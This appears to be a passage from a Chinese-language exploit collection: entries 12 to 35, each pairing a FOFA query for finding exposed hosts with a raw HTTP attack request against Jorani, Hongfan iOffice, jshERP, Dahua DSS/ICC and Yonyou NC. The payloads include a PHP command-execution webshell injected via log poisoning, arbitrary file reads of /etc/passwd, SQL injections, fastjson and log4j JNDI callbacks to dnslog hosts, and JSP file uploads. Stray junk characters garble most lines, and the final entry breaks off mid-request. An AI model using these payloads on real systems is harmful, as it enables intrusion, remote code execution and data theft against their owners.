' s7 M3 N3 b+ fHost: 127.0.0.1& [4 L5 d3 |( M
Pragma: no-cache4 ? w8 P# ]) Z7 ^5 B
Cache-Control: no-cache* l$ m, j' e/ r- U
Upgrade-Insecure-Requests: 10 K5 A" D1 C: b6 L. r# m6 p
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36* k% d& s3 r+ U# r9 Z# y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
* b. o2 l. t$ @# P: d; w3 G2 F2 {Accept-Encoding: gzip, deflate
8 v* {7 i% }" H* M8 b; ^) m- F: M8 t! wAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
& F; N: I9 R% h) |. f( P' _Connection: close
& z) e: X, t$ m1 A/ _# ^6 Q
9 ~' W1 E! M1 k* E/ n
" N& ]4 A1 O" b/ ~12. Jorani < 1.0.2 远程命令执行1 _0 R+ `1 t" r/ \# m1 n$ O
FOFA:title="Jorani"3 ?% [( `. ]: E7 q7 x. u3 R9 O `
第一步先拿到cookie
- C# @# G$ a9 |1 oGET /session/login HTTP/1.1
9 ~& \- o# I9 \7 L# D& K8 xHost: 192.168.190.301 G1 G+ u, n( ?# ?( Z2 r+ M
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36( L* t4 h3 V7 P+ |' Q* ?4 r# b+ ]
Connection: close
2 S2 N* c7 L m) |3 dAccept-Encoding: gzip
% D/ s- W3 { H% y
9 a' X' L0 h! B# f# o% k% O: X- q( h. o
响应中csrf_cookie_jorani用于后续请求
$ g) _5 A3 U, e6 I) t# YHTTP/1.1 200 OK
7 H7 m" z/ L ~4 x$ ?Connection: close
5 { J% w7 f8 @5 E1 ]. LCache-Control: no-store, no-cache, must-revalidate
/ D/ ~7 p1 X0 l. X0 [5 E$ sContent-Type: text/html; charset=UTF-8: y1 o; E" \% z: t
Date: Tue, 24 Oct 2023 09:34:28 GMT" ^' d3 Y% v, y Q0 M
Expires: Thu, 19 Nov 1981 08:52:00 GMT
2 J. o, j4 M6 iLast-Modified: Tue, 24 Oct 2023 09:34:28 GMT" b# J. h3 |8 b: g% @3 E. H$ h2 d! w
Pragma: no-cache8 y5 E1 C* Y. n
Server: Apache/2.4.54 (Debian)+ M+ ^0 O d0 m$ d+ @
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/, y4 S! z+ `% g' o
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
g; Y \6 k# k. m+ WVary: Accept-Encoding
2 R4 `5 A3 Y9 g+ [, n6 X1 N) o3 B* x2 s, s g! I" `
k2 @. v1 [" Y$ }& h+ @POST请求,执行函数并进行base64编码( |4 k+ I2 l/ V# H. Y& d# v
POST /session/login HTTP/1.1
3 m( s) M! z$ }! lHost: 192.168.190.301 w" v+ E4 f7 }2 B9 T2 v
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36& b8 ], Q4 J# G
Connection: close
- |4 H- q+ N" m& o' SContent-Length: 2522 V- E4 B7 v1 J( y6 p
Content-Type: application/x-www-form-urlencoded) {% J, g, ~5 |+ q1 g% N2 |
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
: Q4 F0 K3 x- {( G1 @Accept-Encoding: gzip7 e b6 s( N( O2 `( N" Y: @. z) L
5 n4 y, K. `. v
csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor9 m# X7 K* @; ^/ x
: I" [1 }3 ]* X! k2 G
6 B y+ w4 N, V# [9 F' N+ X4 [9 s) n' x* }
向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串
; B. B- J1 \% }; l, lGET /pages/view/log-2023-10-24 HTTP/1.1
9 H# J1 M% f, ?& o0 E' vHost: 192.168.190.30! ]1 ?% K' j. N2 l
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.367 @ b4 X2 c0 K6 R
Connection: close- w& G+ n; O* y! o3 Q% y! H
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r6 Z. G6 U4 ?* i& r' J
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
3 Z+ x& ?5 M% o$ @X-REQUESTED-WITH: XMLHttpRequest) Y+ ?4 B! G1 m) v
Accept-Encoding: gzip
! w& Y% W7 R" B, b% a
6 \0 N) D; e1 P
% H! ]8 T5 C+ D13. 红帆iOffice ioFileDown任意文件读取" v' W* q1 y6 }
FOFA:app="红帆-ioffice"
' B$ o$ C$ S( W$ }% s2 e! ~GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1 d& s4 G5 z' V* x
Host: x.x.x.x' i! _3 y* ] e7 A! s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
" T4 \ Z4 r) v! RConnection: close
. m/ w" v5 x0 R4 {5 l9 ZAccept: */*
# T5 L+ X6 M7 C4 v% p9 |# U. L2 p1 RAccept-Encoding: gzip
9 j. ~0 I+ K: N7 W( H# ?/ ?" B& n! J, T4 `5 Q
, b; Q5 D) ^" K3 j% V' M: f14. 华夏ERP(jshERP)敏感信息泄露 ^1 m( [8 O. G5 j2 E" w
FOFA:body="jshERP-boot"
Z* w2 I- M! E# c7 l泄露内容包括用户名密码2 [! q" l5 B8 c
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
5 f! B; f- u4 @' p; U6 a* xHost: x.x.x.x
* z1 D }8 n& E! ^" P, V* EUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36" C9 R% \( l* R3 q5 Q
Connection: close
+ A* \/ h( C+ ?/ F3 W9 KAccept: */*/ |! {9 O1 B2 m+ k" N" F
Accept-Language: en( R2 a9 E+ `, c! B$ o
Accept-Encoding: gzip* L* c6 J. q$ b/ [6 E7 ]# r; i
5 C' |8 s' L4 {
. \3 N! O, ?, ^: K! ~% c; V9 d1 Y15. 华夏ERP getAllList信息泄露
; C0 s5 \+ g- [& W! ] }, b% U" pCVE-2024-0490
/ ~* r: }' y6 \. NFOFA:body="jshERP-boot"! U2 G2 p) k4 A6 r
泄露内容包括用户名密码' ~1 y- w0 A% E4 t
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
2 L5 P/ c- \+ Z9 vHost: 192.168.40.130:100( J( L& f }& P ~' \
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
' i& g+ f" ]4 T, g9 U& O% }, ^Connection: close
% S/ ~: Q8 ?* E7 n% }Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8- E" A9 M5 n# T
Accept-Language: en% K6 s* {+ B; Y3 _$ V3 z
sec-ch-ua-platform: Windows/ Z1 }) G( O9 |( H( b- S
Accept-Encoding: gzip
* S- {* b3 F4 R6 k% S: Q8 o) q' L. A: }' K! O0 e2 v2 V8 v5 F
9 b4 g* V4 i, J+ v& x0 o
16. 红帆HFOffice医微云SQL注入( Y8 u3 [6 E+ @& N. j
FOFA:title="HFOffice"2 j2 o2 ~' e% e! r1 j6 F. p
poc中调用函数计算1234的md5值! ?2 ~& E* F9 S5 X
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.19 l: O2 `; P. J H! d9 H
Host: x.x.x.x6 K {7 D+ N7 C& C7 y' Z/ y
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.363 ~3 E, b5 H2 J, m8 R% N" `
Connection: close0 O* f) m! Z) E: h' `
Accept: */*) p7 ], L: K* C: w. o( G8 h. ]
Accept-Language: en" i4 E- |5 R( G( A
Accept-Encoding: gzip
0 S3 M& V" B+ ?. s# w# W6 n, C
8 |( ~) e/ B6 _- J4 X# f( c4 w* \
& m @5 \" Q5 O3 } _: s* K17. 大华 DSS itcBulletin SQL 注入
9 V9 P, I2 d; p) fFOFA:app="dahua-DSS"; e8 G- m4 X" [" I! B8 }7 _( t+ m
POST /portal/services/itcBulletin?wsdl HTTP/1.1
- d5 q" x8 p+ HHost: x.x.x.x$ e0 x" B' c/ E. v6 U1 K' ~% K
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15" t' K, t$ @% W& N" p
Connection: close
$ b3 {1 i" ?( A) dContent-Length: 345
' f+ ~3 Y1 k4 A/ wAccept-Encoding: gzip
0 O9 B& K) I& ^) F }' q3 C9 i; K- u8 }3 }- g& X q
<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
p! C1 M& E& s0 T- b0 s<s11:Body>
# a2 F4 }# _: k' _& g. h. n9 w <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
^7 x0 l. S' X( S5 {2 [* t: V <netMarkings>
) n% M# V( H/ k( `) | (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
6 t! O" |2 r" E9 h& a! g' v </netMarkings>
) ? z# ]# t7 Q& r" Z1 R7 u </ns1:deleteBulletin># \- ]; S3 t/ L. G- ^8 o) d
</s11:Body>
. Q z* Q- B. K0 Z) _</s11:Envelope>
5 B' E; q8 l/ h Z% N! |
+ e. d. M6 K0 w4 i; }' A6 C( }6 U$ {% k2 U, n* Q2 i
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
/ [$ T8 x7 [ @) @7 [2 _( ?FOFA:app="dahua-DSS"4 F! m! {' l0 H$ T
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.13 }/ E: p, i2 e. p$ @
Host: your-ip
4 i9 L0 \9 `2 c6 W5 X% l* I6 OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
/ V5 U( o% j& E: LAccept-Encoding: gzip, deflate
/ q& a6 g) w! m1 \7 \4 x+ ^# cAccept: */*
8 \ o8 k: {9 U ~Connection: keep-alive# D: f z* j9 m+ s: |# ~, G
0 c! X/ G0 a" i- T% q
, t- {' h4 }) S
0 i$ f' L% f8 w5 v' Q# d19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
0 K- o5 ?+ w1 {3 n6 CFOFA:app="dahua-DSS"
: ?1 N1 g2 F# f" \- \( S' GGET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
$ W# C8 W/ }6 }- @Host:
. @8 |% H4 q% |User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
( Z$ |# L) e) _) w" f/ mAccept-Encoding: gzip, deflate7 j& _8 x0 O' R3 B1 U7 e
Accept: */*5 }& }5 u) V0 c* y6 H1 k. R( H
Connection: keep-alive; j$ Z6 Z% i9 L8 @" \' S. R
9 l5 _8 U- ]. W- s& Z. c
% U% C& y H! W9 v20. 大华ICC智能物联综合管理平台任意文件读取& E! u% W9 Q% y; r- G8 ^
FOFA:body="*客户端会小于800*"
1 N, X# W7 y' p0 ~GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1% Q# H9 w5 w; t9 X
Host: x.x.x.x
( ~, z4 H E$ D+ z! E7 C, {User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
% V6 L8 w* O2 n! OConnection: close4 k, o2 p" \# Q1 c6 c9 s o# f& n
Accept: */*$ m0 A! H. m6 Y0 H) O5 v
Accept-Language: en A. W: Y3 V. c2 L \! N
Accept-Encoding: gzip
# Q, G4 s( W9 `. P! e$ b1 E7 ?0 u8 k+ h8 _7 @% }
" x+ W% b b$ Q5 a; z4 O
21. 大华ICC智能物联综合管理平台random远程代码执行, N' L: F2 _9 H" R1 V$ O5 Y
FOFA:icon_hash="-1935899595"% v6 B: {. C( H7 d4 V# I
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1* e% E; E, d2 b
Host: x.x.x.x7 t) w7 W" i; Y6 K2 x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.157 V8 C- ?2 Q. W# \3 q( u: J0 A
Content-Length: 161# g" { ?" U" {$ O& T& }5 u& X
Accept-Encoding: gzip
# Y( \7 U. J5 K6 y5 _5 ]- a0 [Connection: close5 [; P3 N$ ^' z( I7 |
Content-Type: application/json;charset=utf-8
; T4 e; H0 p T7 e/ n @
( k# R7 z1 ? S$ f# V{* u$ L0 `6 |6 P7 _
"a":{
- v. {4 b I6 B c9 i1 x3 ]: }0 e "@type":"com.alibaba.fastjson.JSONObject",
4 h+ W& g, ~+ I3 u- ^& F {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}$ N: V% C1 f+ k: [
}""
& f" @ [* b+ u- i# ?/ V}
) ^* l g3 F) k* s) O2 e. w# o- t" | v1 \+ L0 t2 [
/ l$ U) ?5 l3 G: j4 r
22. 大华ICC智能物联综合管理平台 log4j远程代码执行$ Q8 O8 Q) h/ T# f0 Q
FOFA:icon_hash="-1935899595"
( z. q4 l! H B4 g" pPOST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
8 {9 f [9 H9 j/ [& _3 vHost: your-ip- L Q$ ~% }+ y& G" K$ M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
: E u& K) U; q% H1 d/ P. DContent-Type: application/json;charset=utf-87 H4 g t2 ^3 N
! B. I, m6 A7 _. J
{, `- F, x2 K1 ^2 @8 k
"loginName":"${jndi:ldap://dnslog}". c# y$ [' {. [7 B A
}# V' R, [: a$ O
, n. ~- m8 w, F/ v" J
- f/ h! R1 K) ?3 \% H% A! V- y$ L2 [0 f: \) S) ^$ s
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行( w/ v' i* v0 C$ S0 V6 T, `- k/ [
FOFA:icon_hash="-1935899595"
# U" B: h( {/ h' T* \5 SPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
* D& J+ {9 q7 c* Z$ a8 r) QHost: your-ip7 S! Z4 F$ z+ u: L0 J$ I9 N/ [
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15& M3 o% y0 z- y3 P q9 z
Content-Type: application/json;charset=utf-82 M" q9 ?) V9 O1 g
Accept-Encoding: gzip
+ t4 v7 m- ^$ l2 A5 g( J$ I+ d% HConnection: close
7 q. v' r8 F# f7 A3 M9 G0 w- W. @) j- l! }' U, H% C8 l& K
{9 A( | y" C( r! T O1 r4 X# N
"a":{
4 g0 N" ?0 n$ }# Q4 I "@type":"com.alibaba.fastjson.JSONObject",
1 x: s$ I5 L, U! x9 q6 E4 ] {"@type":"java.net.URL","val":"http://DNSLOG"}
0 @# e' W" R$ T) \4 W7 b }""
& Z& t( I& v# F" Q# ]" K}3 U8 D+ M/ a: `
% c. R1 V" d2 a5 e$ P1 y4 y# F
; v2 U$ |- [0 h1 i0 [. j
24. 用友NC 6.5 accept.jsp任意文件上传
! i- f' f% D9 p* y2 |FOFA:icon_hash="1085941792"' v. _% |' e; V
POST /aim/equipmap/accept.jsp HTTP/1.1
* F. x; M* i; E( j. THost: x.x.x.x3 @* c: a6 N8 e, J$ G7 E
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.364 s+ d8 s/ N. K+ @
Connection: close
& e% X) t& t# l- ^Content-Length: 449
7 y* O; [. _6 ?Accept: */*
9 L5 e/ H# q' ]' U- lAccept-Encoding: gzip7 {: v& u9 X/ U9 R$ O1 t# f7 V4 C ]3 M
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc. ~! J: x( l7 r2 v
, Q' Z" E1 F' l1 Q& y( b# |3 g
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
: H' b7 I0 C7 }: ^Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"8 M \7 b( p0 _7 W
Content-Type: text/plain( T, m8 B9 q, l* S. L! c
8 Z% ?% T" r( {% s6 F; L
<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>& Y, ?4 {/ k. a& ?- o8 g, i
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
/ y# o7 d8 w3 JContent-Disposition: form-data; name="fname"# _& I! [; R2 l" t! `
) L% x I S0 _4 |. _ s7 [
\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp$ Z+ |: `" _0 ?+ i
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--8 V* [- S- z5 n
5 g& f) y" _/ X( ]8 K8 V1 X
, N, X5 j' q: R- U25. 用友NC registerServlet JNDI 远程代码执行
/ T3 }; l. h) B& ^FOFA:app="用友-UFIDA-NC"
C2 n; K3 }- K0 kPOST /portal/registerServlet HTTP/1.1
n4 w) A. e8 z6 u2 v4 l8 G! O) ] ^% ^Host: your-ip
9 g g! n, `1 ~, ]User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
; M6 Q6 u) u# C5 \6 x& ZAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
c K2 S, J' V0 y; yAccept-Encoding: gzip, deflate! q, a5 z$ a3 b% x$ K: T6 j* u
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
/ z* h P7 I0 E eContent-Type: application/x-www-form-urlencoded
2 g" X- B& ^* m# ]0 U- w1 @* t
; y8 p7 n/ A0 e) P' c7 htype=1&dsname=ldap://dnslog
$ m, H1 Y) _! {. j6 G1 y; G& W
/ y$ i- W- r0 V9 `9 ]0 V7 R9 i6 t( G3 W& p
$ b3 S6 _4 l7 u. w, K, z2 `+ \9 [6 O26. 用友NC linkVoucher SQL注入% n2 o( R+ |8 ]) ~9 F+ e* o5 P/ R
FOFA:app="用友-UFIDA-NC"
: W1 I' v2 [* O W1 ]7 t. NGET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
3 T* x5 b* \- M* O. h6 k) ?Host: your-ip
$ L9 S3 t& i0 b4 t0 l+ Y& K" dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
5 q) F* ^' ?! [6 M. Y8 \* n0 F3 fContent-Type: application/x-www-form-urlencoded1 B& m& B) m$ h' T4 b7 F% [# P- {
Accept-Encoding: gzip, deflate8 r4 L' N5 Y8 `$ ~& [2 e' x
Accept: */*
' p8 n. k0 R6 `7 \4 ^# xConnection: keep-alive. O1 h Q6 @% @2 h$ b1 Y0 Y
5 T4 S+ e* C9 y! J- A: a, v
% P) z. c9 y; t+ E8 R& p27. 用友 NC showcontent SQL注入
1 P% d. t% F7 x' H4 C2 hFOFA:icon_hash="1085941792"0 Q% L2 \( k6 r4 B# P, y) L
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1% d5 F9 s/ G% P0 F- w
Host: your-ip) a1 e1 V) P+ H, O1 P
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36. _1 k, V& N# a C9 k6 P
Accept-Encoding: identity
' V; L( T) E6 `- U, B6 jConnection: close
2 E$ {. B! W% f J5 Z+ v5 MContent-Type: text/xml; charset=utf-80 u4 p$ H& \ K7 ~2 z
% v! \. N* ]& o# y) b$ {, S% a
! @. e4 g0 V8 J' {, q) p1 @28. 用友NC grouptemplet 任意文件上传
* Q" A1 E" M% I# rFOFA:icon_hash="1085941792"; h" }0 Z1 r, |' y8 b9 B' J
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1% {4 g. F6 v. F$ o
Host: x.x.x.x. V+ d7 A4 x' K* G" u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.366 Z9 M5 r0 w- }- r
Connection: close
1 k7 g/ @: A$ z; l4 L5 w9 eContent-Length: 268 W( \# e8 k3 O% J, \
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk2 U7 p' h" w7 s9 j6 G
Accept-Encoding: gzip
% A! T/ U/ B' ^' c# X8 }" I" M' Y: r3 `
! m4 b1 R: |. T& q------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
& h8 v, a0 t+ PContent-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
8 R7 b) z) |/ v, P' A$ c% xContent-Type: application/octet-stream! k/ {5 ?' n2 e: B- M! m
3 Y3 V/ |& [( c1 t Z3 u6 @) b<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
: g" k# A& ]" N5 c- m2 F5 @& E0 p8 P------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--
7 f6 A) A1 C- a4 b6 \& L
( Y( I" ]" F; E+ H+ g
- r1 n0 k4 i; q- ]' I/uapim/static/pages/nc/head.jsp$ A) Q: y# T% W3 \, F+ s$ ~7 y
! K6 K) e6 Z2 J# U0 X; x
29. 用友NC down/bill SQL注入
$ ?: J: {, ^; R U4 nFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"4 M2 z2 X$ y* b# ^
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1' T8 I& K, D g
Host: your-ip" U1 k3 V& G8 [) [' D0 n7 o" e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
$ e+ _. Q2 x, p* UContent-Type: application/x-www-form-urlencoded
* X# n$ b& u1 T: U- R4 eAccept-Encoding: gzip, deflate
9 k1 N, l# t, ]Accept: */*
2 ?7 l! c, a5 i: `4 H! BConnection: keep-alive
2 Y( u" S+ w+ a* i0 g( _* d# q* V; ~9 q& f+ G7 X
4 j) b' c9 R X1 }3 E
30. 用友NC importPml SQL注入0 g1 A: a/ y* ?' Q3 F
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
k7 O; ~, @% `1 F2 f7 WPOST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
4 ]6 |8 P6 f( O: L) i( Y" r' GHost: your-ip/ f/ y7 b6 ?) [
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V5 D8 U4 r5 J7 O: n/ C- F' L9 c% V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
/ B8 D, c; `8 V; b3 B3 x* }Connection: close. H. T) x- Q3 _$ S0 a0 j+ ~* T( @9 s
. |+ p5 w4 U9 r# J% P* r+ M6 g------WebKitFormBoundaryH970hbttBhoCyj9V7 B# H* t$ p2 ]: u: z I" X5 X
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"+ g) r' R5 @- V4 ?; q8 X
Content-Type: image/jpeg
' ?. i4 D( s# H5 K' b% L------WebKitFormBoundaryH970hbttBhoCyj9V--
+ f$ r1 U) N8 p
/ p/ ^" r7 G: f2 H& B0 A/ D! h, G/ W8 V; R* c) B) l
31. 用友NC runStateServlet SQL注入
: I4 _9 _/ ]& b3 Wversion<=6.5% a: w# r0 i9 e& c# ^1 `6 l
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"7 d4 N$ t8 v3 @8 w! i. b
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
. o+ }1 ?% o5 i: B8 i; MHost: host
) x- H* l$ z% c4 ]3 j8 _User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36) r8 j) S, w+ k7 v( D) J2 y5 l' \
Content-Type: application/x-www-form-urlencoded4 T, I$ g4 R0 i( o. v6 h
- C- ~/ u# F4 J
: o% N- c! w0 P: l
32. 用友NC complainbilldetail SQL注入
. ?5 l7 o3 G/ `0 ^version= NC633、NC65
0 V# H, o* K* x0 O hFOFA:app="用友-UFIDA-NC"
, D/ X9 u; m5 NGET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.11 U8 x0 B( z% O1 ]1 b
Host: your-ip
`3 C8 p" F6 K6 R0 s# i" jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
* G/ C. z- X4 R9 {. |9 c- yContent-Type: application/x-www-form-urlencoded* d9 b+ t* \( x# Y* T7 D
Accept-Encoding: gzip, deflate \/ n/ b. z/ @5 }5 y( v
Accept: */*
* w0 \/ P! _3 l2 c9 d5 O7 E! ZConnection: keep-alive7 _3 ~% M0 b! j2 `$ X
. T+ M* t: w3 g f3 |) Z+ M7 ^9 L* f3 f8 v
33. 用友NC downTax/download SQL注入
# b- ~; ]; [# L6 B* p! Aversion:NC6.5FOFA:app="用友-UFIDA-NC"( i' d, i% J2 c( V" \# G0 V) C
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
: A8 d4 y* J+ w4 kHost: your-ip; I r, o" U+ N& E0 v3 G
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.362 \8 y5 J. b' F6 D' ~
Content-Type: application/x-www-form-urlencoded
6 r! g! w, Z1 T$ B* _& eAccept-Encoding: gzip, deflate- d& S5 _$ I+ f _( s
Accept: */*
! K# k* K+ U" q4 zConnection: keep-alive
7 F. }+ H9 O, V! U3 f! E( T2 |! W" I" \" L. ^+ N% {" T: J
/ a+ P" V. m9 y# a% c34. 用友NC warningDetailInfo接口SQL注入/ H# |0 v U0 u3 M4 o( C
FOFA:app="用友-UFIDA-NC"8 S& y' n: R* i2 n
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1* R* i9 R1 B% h" \" g
Host: your-ip
- L2 m' @$ \3 ?" I! X# EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
$ i! O* m. ?1 \! B* [Content-Type: application/x-www-form-urlencoded9 q7 {+ q; [8 ?" i! n
Accept-Encoding: gzip, deflate
" {# x, v$ x* T2 Z" D' KAccept: */*
1 F5 Z4 [: m" r( V2 d4 YConnection: keep-alive
8 P Q7 Y3 F$ R* w) ]; X2 M9 o. U. w6 m+ S) \4 U% D Z6 A5 E' S
0 R% ~+ R( f) g" |# J* P& r8 C
35. 用友NC-Cloud importhttpscer任意文件上传
6 r/ D* h! B# [" g" f! L6 T5 AFOFA:app="用友-NC-Cloud"
1 d5 l4 ]. t7 ? V. Q$ L0 kPOST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1. w( A7 Q$ W( i5 p
Host: 203.25.218.166:88883 J, ]& m2 C- I4 z
